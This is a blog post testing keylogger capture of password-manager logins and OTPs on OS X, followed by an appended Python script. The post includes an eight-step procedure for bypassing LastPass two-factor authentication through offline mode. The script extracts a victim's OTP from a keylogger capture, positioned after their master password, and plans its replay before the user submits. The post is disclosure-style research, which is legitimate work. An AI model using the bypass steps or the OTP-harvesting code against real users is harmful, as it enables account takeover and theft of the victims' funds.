Password managers – convenient for you or for an attacker? LastPass two-factor authentication bypass

In *, 2FA, Cloud, Confidentiality, Data at rest, Encryption, Hacking, Penetration Testing, Research, Vulnerabilities by [email protected]

I have been wondering about password managers for a while and have been too paranoid to use them. The reason being that with a password manager all of your passwords are stored in one place. One false move (click the wrong link or open the wrong attachment) and you have an attacker's keylogger running on your system. Now, instead of having to compromise each account separately, the attacker just has to get the password to your password manager, and they have everything conveniently accessible in one place.
Why is this bad? Because, for example, if I only log into my PayPal account once every 6 months, an attacker would have to sit listening to a keylogger for 6 months to get my PayPal password. For that matter, the attacker would not even know I had a PayPal account. With a password management solution they know what accounts you have and are given immediate access to all of them. This allows an attacker to compromise all of your accounts simultaneously, meaning they can try to transfer money out of your PayPal, checking account, savings account, 401k, bitcoin, you-name-it account; all compromised at once.
Many security pros would say that is an easy problem to solve: just use two-factor authentication to access the password manager. Problem solved, right? See Part 2 for the answer.
I have run all tests using the latest version of OS X 10.10 Yosemite, the latest version of the Safari browser (wait, I thought Macs were not hackable…), and the keylogger logKext 2.3.
Part 1. Without two-factor authentication
Test case #1 – Enter password from actual keyboard
Result:
Full username and password captured
Test case #2 – Enter password from on screen keyboard
Result:
Nothing captured by the keylogger, although there may be other attack vectors.
Part 2. With two-factor authentication
Test case #3 – Enter password and OTP from two-factor token (Google Authenticator)
Result:
Full username and password captured
Six digit OTP captured
Test case #4 – Enter password and OTP from two-factor token (Yubikey)
Result:
Full username and password captured
The static password stored in slot 1 captured
The OTP stored in slot 2 captured
Test case #5 – Disable the Internet connection with two-factor authentication enabled.
Assuming that an attacker gets the LastPass credential of a user who has two-factor enabled, they may be able to do this to bypass two-factor.
Step 1. Log out of LastPass
Step 2. Open a website login page
Step 3. Disable Internet
Step 4. Log into LastPass
NOTE: Since there is no connection to the Internet I was not even prompted for an OTP. LastPass is in offline mode.
Step 5: Go to LastPass vault to select a login page
Step 6: Enable Internet
Step 7: As soon as the Internet comes up, click to log in (about a 5-10 second window)
Step 8: Login is successful (if not, just turn off the Internet, log into LastPass and try again)
Notice that there is a warning icon where the LastPass extension is, and the login page gave me a warning, but I was still able to bypass the two-factor requirement and log into the site.
Conclusions: Password management solutions are convenient for users. Unfortunately, under some conditions they can be even more convenient for attackers. My conclusion is that the most secure way to use a password management solution is to use the on-screen keyboard for password entry. The keylogger was not able to obtain this password (although keep in mind that just because I could not do this does not mean it is not possible; there may be an attack that would be able to do this). Two-factor authentication helps, but as shown with LastPass there may be ways to bypass the two-factor authentication. Also, if the OTP token is captured in real time, an attacker's automation script would be able to capture the OTP from the keylogger and use it before the user clicks submit. This could be automated with something like Selenium. The Selenium script essentially just greps the log of keystrokes for whatever comes after the LastPass password and enters it into the browser login page on the attacker's system. The user would just see that their login failed and try again.
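The keystroke-grepping half of that automation, as an added example that is not code from the original post: it locates the master password in a capture, pulls out the second factor typed right after it, tells a Google Authenticator code from a Yubico OTP by shape, and reports how long a TOTP code stays valid under RFC 6238 timing. The capture format (a plain character stream with Enter recorded as a newline), the master passwords and both sample captures are constructed for this example and are not logKext output.

```python
"""Added example, not code from the original post: the "grep the keystroke log
and replay the OTP" automation described in the conclusion, minus the browser.

Given a keylogger capture it finds the LastPass master password, extracts the
second factor typed immediately after it, classifies that factor (6-digit TOTP
or 44-character Yubico OTP) and, for TOTP, reports how long the code remains
valid under RFC 6238 30-second time steps. The capture format (character
stream, Enter recorded as "\\n") and all sample data are constructed here.
"""
import re
from typing import Dict, Optional

# Yubico OTPs are 44 "modhex" characters: a 12-char public ID followed by a
# 32-char encrypted token, all drawn from this 16-letter alphabet.
MODHEX_ALPHABET = "cbdefghijklnrtuv"

# Constructed captures mirroring test cases #3 and #4 in the post:
# username, Enter, master password, Enter, second factor, Enter.
TOTP_CAPTURE = "user@example.com\ncorrect-horse-battery\n482913\n"
YUBICO_CAPTURE = (
    "user@example.com\n"
    "static-slot1-password\n"                          # slot 1 static password
    "ccccccbcgujhingjrdejhgfnuetrgigvejhhgbkugded\n"   # slot 2 Yubico OTP
)


def extract_second_factor(capture: str, master_password: str) -> Optional[str]:
    """Return the Enter-terminated entry typed right after the master password,
    or None if the password has not been typed (or nothing followed it yet)."""
    marker = master_password + "\n"
    idx = capture.find(marker)
    if idx < 0:
        return None
    rest = capture[idx + len(marker):]
    token, _, _ = rest.partition("\n")
    return token or None


def classify_second_factor(token: str) -> str:
    """Distinguish a TOTP code from a Yubico OTP by shape alone."""
    if re.fullmatch(r"\d{6}", token):
        return "totp"
    if len(token) == 44 and all(c in MODHEX_ALPHABET for c in token):
        return "yubico-otp"
    return "unknown"


def totp_seconds_remaining(now: float, step: int = 30) -> int:
    """Seconds (1..step) until the current RFC 6238 time step rolls over.
    Servers often also accept the previous step, so this is a lower bound on
    replay time; in practice the binding limit is that the legitimate user
    submits the same code first."""
    return step - int(now) % step


def plan_replay(capture: str, master_password: str, now: float) -> Dict[str, object]:
    """What the attacker's browser script needs: the token to type and the
    clock deadline. A Yubico OTP is counter-based and single-use, so it has
    no time limit, only the race against the user's own submit."""
    token = extract_second_factor(capture, master_password)
    if token is None:
        return {"token": None, "kind": "none", "seconds_left": None}
    kind = classify_second_factor(token)
    deadline = totp_seconds_remaining(now) if kind == "totp" else None
    return {"token": token, "kind": kind, "seconds_left": deadline}


if __name__ == "__main__":
    print(plan_replay(TOTP_CAPTURE, "correct-horse-battery", now=1430000003))
    print(plan_replay(YUBICO_CAPTURE, "static-slot1-password", now=1430000003))
```

The browser-driving part the post mentions (Selenium typing the master password and then this token into the attacker's own LastPass login) is left out so the example runs offline; it would consume `plan_replay`'s output and has to finish before the user's own submit, since TOTP verifiers are supposed to reject a code that has already been accepted and a Yubico OTP is single-use by design.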
